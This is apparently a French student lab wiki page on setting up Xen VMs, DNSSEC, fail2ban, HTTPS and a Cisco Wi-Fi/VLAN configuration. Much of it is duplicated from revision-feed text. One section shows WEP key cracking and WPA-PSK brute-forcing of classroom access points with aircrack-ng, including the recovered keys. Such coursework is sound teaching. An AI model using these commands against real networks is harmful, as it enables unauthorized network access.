</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>On modifie le fichier <code>/etc/xen/SE4.batman.cfg</code> sur capbreton<syntaxhighlight lang="bash">
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]
</syntaxhighlight>Une fois cela fait on peut '''redémarrer''' la VM avec les commandes précédentes. Ensuite sur batman on doit lancer l'interface :<syntaxhighlight lang="bash">
reboot
ifdown eth1; ifup eth1
</syntaxhighlight>
== Configuration SSH et Mascarade ==
Ces commandes permettent de '''synchroniser l'heure''' du système :<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>
La mascarade se configure avec '''iptables''', et consiste à donne une adresse IPv4 qui permet d'accéder à internet. <syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>Dans les '''trois VMs''' on modifie <code>/etc/ssh/sshd_config</code> en ajoutant :
PermitRootLogin yes
On peut ensuite '''redémarrer''' le service ssh :
/etc/init.d/ssh restart
La '''redirection du port ssh''' ce fait via les commandes suivantes sur la machine mandataire :<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>Dans le fichier <code>/etc/sysctl.conf</code> la ligne suivante doit être '''décommentée''' :<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>Nous avons aussi installer <code>iptables-persistent</code> pour éviter de perdre la configuration à chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Désormais le ssh peut être fait via les commandes suivantes :<syntaxhighlight lang="bash">
# ssh en IPV4
ssh root@<add_ipv4> -p 2202
# ssh en IPV6
ssh root@<add_ipv6>
</syntaxhighlight>

== DNS et DNSSEC ==
On modifie le fichier <code>/etc/bind/named.conf.local</code> afin de fait passer par notre DNS et d'avoir le second DNS en backup :<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans <code>/etc/bind</code> et y créer le fichier <code>db.deadpool.tech</code><syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>
Modification du fichier <code>/etc/resolv.conf</code> (il faut '''commenter''' tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires :<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>

Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

Pour '''restart''' le service<syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>

Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>On peut pour finir '''vérifier''' le bon fonctionnement de notre DNS via le site [https://dnsviz.net/ dnsviz]. Avec notre nom de domaine nous obtenons le graphe suivant :[[Fichier:Deadpool.tech-2026-02-18-08 31 41-UTC.png|centré|vignette]]

== Fail2ban ==
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier <code>jail.local</code> dans le dossier <code>/etc/fail2ban</code>
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans <code>fail2ban.conf</code> (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour '''lancer le service''' il faut rentrer la commande suivante :
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

== HTTPS ==
Dans le dossier <code>/etc/apache2/sites-available</code>

On met la clef '''deadpool.tech.key''' et les certificats '''GandiCert.pem''' et '''deadpool.tech.crt''' (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les commande suivantes :<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

== Effraction WIFI ==

=== Cassage de clef WEP d’un point d’accès WiFi ===
'''/!\''' Dans notre cas la carte réseau de notre zabeth ne fonctionnait plus (ce cas est courant).

Mr Redon nous a donc fournit une '''clé USB Wifi''' pour pouvoir travailler.

De plus les cracotte s'arrête au 13 donc je dois prendre la '''cracotte02'''.

La commande suivante permet de d''''identifier l'interface WIFI''' qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlx40a5efd21410. Donc nous pouvons lancer la commande suivante afin d'<nowiki/>'''identifier l'adresse IP de notre cracotte02'''.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410
</syntaxhighlight>Dans la liste nous avons en effet la cracotte02 sur le channel 4 et l'adresse ip suivante :<syntaxhighlight lang="bash">
04:DA:D2:9C:50:51 -62 231 0 0 4 54e. WEP WEP cracotte02
</syntaxhighlight>Enfin nous pouvons '''lancer le cassage''' de la clé avec cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Le nombre de la section DATA doit augmenter asser vite (sinon il y a un problème) :

Après un certain temps on peut entrer la commande suivante pour '''voir si la clé à été trouvée''' (le numéro, ici 5, dépend du nombre de fois ou la commande précédente a été lancé) :<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un '''KEY FOUND''' !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

=== Cassage de mot de passe WPA-PSK par force brute ===
On s'intéresse maintenant à la '''kracotte02''' (information trouvable par la commande de la section précédente) :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un '''fichier Python''' un dictionnaire contenant '''toutes les possibilités sur 8 chiffres'''. Le contenu de ce fichier est le suivant :<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Lancer ce programme afin de créer le fichier dictionnaire_8_chiffres.txt.

La commande suivante est nécessaire pour que aircrack-ng utilise notre dictionnaire :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Nous pouvons enfin '''lancer le cassage du mot de passe''' par force brute via cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>La commande ci-dessous permet de '''savoir si le mot de passe à été trouvé''' (/!\ cela peut prendre du temps selon la valeur de la clé, dans notre cas plus de 30min) :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight>Nous avons le bon résultat un nouveau '''KEY FOUND''' !!<syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

== Sécurisation WiFi par WPA2-EAP ==

=== Partie VLAN ===

Depuis la machine batman on se '''ssh sur le routeur''' via cette commande :<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

'''Création du Vlan24''' avec le nom PoolAntonin :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour configurer le '''vlan''' que nous venons de créer ainsi que le '''VRRP''' j'ai fait ceci : ('''/!\''' l'adresse IPv4 de votre vlan doit être mise dans le tableau commun sur le wiki afin d'éviter tout conflit avec une autre personne)<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

=== Partie WIFI ===

On peut exit enfin pour se ssh cette fois sur la partie '''wifi''' :<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite les commandes suivantes, inspirées de celle du sujet, afin de configurer notre '''point d'accès wifi''' :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

Par le suite nous avons modifié plusieurs fichiers sans succès. Cette dernière partie est donc '''incomplète''' et ne permet pas de validé cette dernière.

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E13

2026-02-23T10:35:45Z

Abiernac : Page créée avec « <syntaxhighlight lang="shell"> openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr Country Name (2 letter code) [AU]:FR State or Province Name (full name) [Some-State]:Nord Locality Name (eg, city) []:Lille Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille Organizational Unit Name (eg, section) []:IOT Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech Email Address []:billel.cheklat@polytech-li... »

<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>

Atelier SysRes SE4 2025/2026 E14

2026-02-23T10:34:17Z

Abiernac : /* DNS */

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>On modifie le fichier <code>/etc/xen/SE4.batman.cfg</code> sur capbreton<syntaxhighlight lang="bash">
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]
</syntaxhighlight>Une fois cela fait on peut '''redémarrer''' la VM avec les commandes précédentes. Ensuite sur batman on doit lancer l'interface :<syntaxhighlight lang="bash">
reboot
ifdown eth1; ifup eth1
</syntaxhighlight>
== Configuration SSH et Mascarade ==
Ces commandes permettent de '''synchroniser l'heure''' du système :<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>
La mascarade se configure avec '''iptables''', et consiste à donne une adresse IPv4 qui permet d'accéder à internet. <syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>Dans les '''trois VMs''' on modifie <code>/etc/ssh/sshd_config</code> en ajoutant :
PermitRootLogin yes
On peut ensuite '''redémarrer''' le service ssh :
/etc/init.d/ssh restart
La '''redirection du port ssh''' ce fait via les commandes suivantes sur la machine mandataire :<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>Dans le fichier <code>/etc/sysctl.conf</code> la ligne suivante doit être '''décommentée''' :<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>Nous avons aussi installer <code>iptables-persistent</code> pour éviter de perdre la configuration à chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Désormais le ssh peut être fait via les commandes suivantes :<syntaxhighlight lang="bash">
# ssh en IPV4
ssh root@<add_ipv4> -p 2202
# ssh en IPV6
ssh root@<add_ipv6>
</syntaxhighlight>

== DNS et DNSSEC ==
On modifie le fichier <code>/etc/bind/named.conf.local</code> afin de fait passer par notre DNS et d'avoir le second DNS en backup :<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans <code>/etc/bind</code> et y créer le fichier <code>db.deadpool.tech</code><syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>
Modification du fichier <code>/etc/resolv.conf</code> (il faut '''commenter''' tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires :<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>

Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

Pour '''restart''' le service<syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>

Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>On peut pour finir '''vérifier''' le bon fonctionnement de notre DNS via le site [https://dnsviz.net/ dnsviz]. Avec notre nom de domaine nous obtenons le graphe suivant :
[[Fichier:Deadpool.tech-2026-02-18-08 31 41-UTC.png|centré|vignette]]

== Fail2ban ==
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier <code>jail.local</code> dans le dossier <code>/etc/fail2ban</code>
<syntaxhighlight>
[sshd]
enable = true
